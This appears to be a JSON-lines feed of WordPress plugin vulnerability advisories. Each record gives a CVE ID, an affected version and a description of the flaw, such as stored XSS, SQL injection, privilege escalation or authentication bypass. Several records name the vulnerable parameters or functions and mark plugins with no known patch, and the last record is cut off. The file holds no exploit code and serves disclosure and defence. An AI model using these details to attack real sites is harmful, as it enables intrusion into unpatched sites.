{"CVE_ID":"CVE-2024-7030","slug":"clover-online-orders","versionImpact":"1.5.6","description":"The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.5.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update product and category descriptions, category titles and images, and sort order.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8664fec3-4e11-4775-a5ca-b4f58931da76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8664fec3-4e11-4775-a5ca-b4f58931da76?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/admin\\\/js\\\/moo-OnlineOrders-admin.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/admin\\\/js\\\/moo-OnlineOrders-admin.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/public\\\/moo-OnlineOrders-public.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/public\\\/moo-OnlineOrders-public.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9505","slug":"beaver-builder-lite-version","versionImpact":"2.8.4.2","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Button widget in all versions up to, and including, 2.8.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cfab048-efc6-4c7c-a1bd-0a9daf8779bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cfab048-efc6-4c7c-a1bd-0a9daf8779bc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/beaver-builder-lite-version\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/beaver-builder-lite-version\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3177345\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3177345\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpbeaverbuilder.com\\\/change-logs\\\/\",\"name\":\"https:\\\/\\\/www.wpbeaverbuilder.com\\\/change-logs\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10056","slug":"contact-form-with-a-meeting-scheduler-by-vcita","versionImpact":"4.10.4","description":"The Contact Form Builder by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's livesite-pay shortcode in all versions up to, and including, 4.10.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200766\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200766\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contact-form-with-a-meeting-scheduler-by-vcita\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contact-form-with-a-meeting-scheduler-by-vcita\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d1b419c-2276-415d-8c54-15da9125c442?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d1b419c-2276-415d-8c54-15da9125c442?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13487","slug":"woo-multi-currency","versionImpact":"2.2.5","description":"The The CURCY \u2013 Multi Currency for WooCommerce \u2013 The best free currency exchange plugin \u2013 Run smoothly on WooCommerce 9.x plugin for WordPress is vulnerable to arbitrary shortcode execution via the get_products_price() function in all versions up to, and including, 2.2.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-multi-currency\\\/trunk\\\/frontend\\\/cache.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-multi-currency\\\/trunk\\\/frontend\\\/cache.php#L60\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234505\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234505\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-multi-currency\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-multi-currency\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d630dd85-0169-4582-a8ae-54e5053425ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d630dd85-0169-4582-a8ae-54e5053425ac?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2074","slug":"advanced-google-recaptcha","versionImpact":"1.29","description":"The Advanced Google reCAPTCHA plugin for WordPress is vulnerable to generic SQL Injection via the \u2018sSearch\u2019 parameter in all versions up to, and including, 1.29 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries, particularly when the plugin\u2019s settings page hasn\u2019t been visited and its welcome message has not been dismissed. This issue can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/admin.php?rev=3248228#L106\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/admin.php?rev=3248228#L106\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/ajax.php?rev=3248228#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/ajax.php?rev=3248228#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/ajax.php?rev=3248228#L277\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/ajax.php?rev=3248228#L277\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/ajax.php?rev=3248228#L401\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/ajax.php?rev=3248228#L401\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/setup.php?rev=3248228#L636\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/setup.php?rev=3248228#L636\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262396\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262396\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-google-recaptcha\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-google-recaptcha\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/963a9b30-9194-4abc-aa69-eb333cbddef3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/963a9b30-9194-4abc-aa69-eb333cbddef3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3752","slug":"ableplayer","versionImpact":"1.2.1","description":"The Able Player, accessible HTML5 media player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018preload\u2019 parameter in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ableplayer\\\/trunk\\\/ableplayer.php#L375\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ableplayer\\\/trunk\\\/ableplayer.php#L375\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3281106%40ableplayer&new=3281106%40ableplayer\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3281106%40ableplayer&new=3281106%40ableplayer\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ableplayer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ableplayer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85c123ee-8de0-4800-b96b-68bb4d763560?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85c123ee-8de0-4800-b96b-68bb4d763560?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5565","slug":"hide-it","versionImpact":"1.0.1","description":"The Hide It plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'hideit' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/hide-it\\\/tags\\\/1.0.1\\\/plugin.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/hide-it\\\/tags\\\/1.0.1\\\/plugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3d62ac3-7980-4817-ab22-e5d0a6a10d84?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3d62ac3-7980-4817-ab22-e5d0a6a10d84?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4786","slug":"videojs-html5-video-player-for-wordpress","versionImpact":"4.5.0","description":"The Video.js WordPress plugin through 4.5.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fdad356f-cae4-4390-9a62-605201cee0c0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fdad356f-cae4-4390-9a62-605201cee0c0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1874","slug":"wp-data-access","versionImpact":"5.3.7","description":"The WP Data Access plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.3.7. This is due to a lack of authorization checks on the multiple_roles_update function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wpda_role[]' parameter during a profile update. This requires the 'Enable role management' setting to be enabled for the site.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-data-access\\\/tags\\\/5.3.8\\\/WPDataRoles\\\/WPDA_Roles.php#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-data-access\\\/tags\\\/5.3.8\\\/WPDataRoles\\\/WPDA_Roles.php#L23\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f562e33-2aef-46f0-8a65-691155ede9e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f562e33-2aef-46f0-8a65-691155ede9e7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-data-access\\\/tags\\\/5.3.8\\\/WPDataRoles\\\/WPDA_Roles.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-data-access\\\/tags\\\/5.3.8\\\/WPDataRoles\\\/WPDA_Roles.php#L50\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-data-access\\\/tags\\\/5.3.7\\\/WPDataRoles\\\/WPDA_Roles.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-data-access\\\/tags\\\/5.3.7\\\/WPDataRoles\\\/WPDA_Roles.php#L50\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4382","slug":"recently","versionImpact":"3.0.4","description":"The Recently plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the fetch_external_image() function in versions up to, and including, 3.0.4. This makes it possible for authenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/92c3f26a-1a84-459a-874b-07dc83c9f42a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/92c3f26a-1a84-459a-874b-07dc83c9f42a\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-recently-multiple-vulnerabilities-3-0-4\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-recently-multiple-vulnerabilities-3-0-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2542693\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2542693\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8297149-2de3-4e49-80f9-6ea59dea6bce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8297149-2de3-4e49-80f9-6ea59dea6bce?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3447","slug":"ldap-login-for-intranet-sites","versionImpact":"4.1.5","description":"The Active Directory Integration \/ LDAP Integration plugin for WordPress is vulnerable to LDAP Injection in versions up to, and including, 4.1.5. This is due to insufficient escaping on the supplied username value. This makes it possible for unauthenticated attackers to extract potentially sensitive information from the LDAP directory.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd7553e8-e43d-4740-b2ee-e3d8dc351e53?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd7553e8-e43d-4740-b2ee-e3d8dc351e53?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2928150%40ldap-login-for-intranet-sites&new=2928150%40ldap-login-for-intranet-sites&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2928150%40ldap-login-for-intranet-sites&new=2928150%40ldap-login-for-intranet-sites&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1093","slug":"change-memory-limit","versionImpact":"1.0","description":"The Change Memory Limit plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the admin_logic() function hooked via admin_init in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to update the memory limit.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eee7344d-5459-4558-a557-d8c5935ecc30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eee7344d-5459-4558-a557-d8c5935ecc30?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/change-memory-limit\\\/trunk\\\/change-mem-limit.php#L104\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/change-memory-limit\\\/trunk\\\/change-mem-limit.php#L104\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6883","slug":"event-espresso-decaf","versionImpact":"5.0.22.decaf","description":"The Event Espresso 4 Decaf \u2013 Event Registration Event Ticketing plugin for WordPress is vulnerable to limited unauthorized plugin settings modification due to a missing capability check on the saveTimezoneString and some other functions in all versions up to, and including, 5.0.22.decaf. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify some of the plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/689abb68-0c19-4f89-91db-fd15ab8bca8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/689abb68-0c19-4f89-91db-fd15ab8bca8e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-espresso-decaf\\\/tags\\\/4.10.46.decaf\\\/admin_pages\\\/events\\\/Events_Admin_Page.core.php#L2800\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-espresso-decaf\\\/tags\\\/4.10.46.decaf\\\/admin_pages\\\/events\\\/Events_Admin_Page.core.php#L2800\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10226","slug":"arconix-shortcodes","versionImpact":"2.1.13","description":"The Arconix Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'box' shortcode in all versions up to, and including, 2.1.13 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94bae97d-2959-4ace-992d-1f4b1ccc8c3b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94bae97d-2959-4ace-992d-1f4b1ccc8c3b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/arconix-shortcodes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/arconix-shortcodes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176718\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176718\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11195","slug":"email-subscribe","versionImpact":"1.2.22","description":"The Email Subscription Popup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's print_email_subscribe_form shortcode in all versions up to, and including, 1.2.22 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8c18b0d-15fe-45d6-9915-85d38803c117?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8c18b0d-15fe-45d6-9915-85d38803c117?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribe\\\/tags\\\/1.2.22\\\/wp-email-subscription.php#L2860\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribe\\\/tags\\\/1.2.22\\\/wp-email-subscription.php#L2860\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-subscribe\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-subscribe\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189989\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189989\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0522","slug":"likebot","versionImpact":"0.85","description":"The LikeBot  WordPress plugin through 0.85 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4c2eed5a-f4d8-457d-a403-7eaced36c491\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4c2eed5a-f4d8-457d-a403-7eaced36c491\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5563","slug":"wp-addpub","versionImpact":"1.2.8","description":"The WP-Addpub plugin for WordPress is vulnerable to SQL Injection via the 'wp-addpub' shortcode in all versions up to, and including, 1.2.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-addpub\\\/trunk\\\/wp-addpub.php#L541\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-addpub\\\/trunk\\\/wp-addpub.php#L541\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-addpub\\\/trunk\\\/wp-addpub.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-addpub\\\/trunk\\\/wp-addpub.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8945eed-eee4-4043-b6ab-d1ea553a4a23?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8945eed-eee4-4043-b6ab-d1ea553a4a23?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4785","slug":"video-sidebar-widgets","versionImpact":"6.1","description":"The Video Sidebar Widgets WordPress plugin through 6.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/61873267-9f4f-4be5-bad6-95229ad54b99\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/61873267-9f4f-4be5-bad6-95229ad54b99\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4381","slug":"ulisting","versionImpact":"1.6.6","description":"The uListing plugin for WordPress is vulnerable to authorization bypass via wp_route due to missing capability checks, and a missing security nonce, in the StmListingSingleLayout::import_new_layout method in versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to change any WordPress option in the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff5755dc-2262-47f6-ac3a-6bca9529d088?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff5755dc-2262-47f6-ac3a-6bca9529d088?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3249","slug":"web3-authentication","versionImpact":"2.6.0","description":"The Web3 \u2013 Crypto wallet Login & NFT token gating plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.6.0. This is due to incorrect authentication checking in the 'hidden_form_data' function. This makes it possible for authenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/web3-authentication\\\/tags\\\/2.6.0\\\/classes\\\/common\\\/Web3\\\/controller\\\/class-moweb3flowhandler.php#L198\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/web3-authentication\\\/tags\\\/2.6.0\\\/classes\\\/common\\\/Web3\\\/controller\\\/class-moweb3flowhandler.php#L198\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e30b62de-7280-4c29-b882-dfa83e65966b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e30b62de-7280-4c29-b882-dfa83e65966b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4418","slug":"custom-css","versionImpact":"2.0.7","description":"The Custom CSS, JS & PHP plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.0.7. This is due to missing or incorrect nonce validation on the save() function. This makes it possible for unauthenticated attackers to save code snippets via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 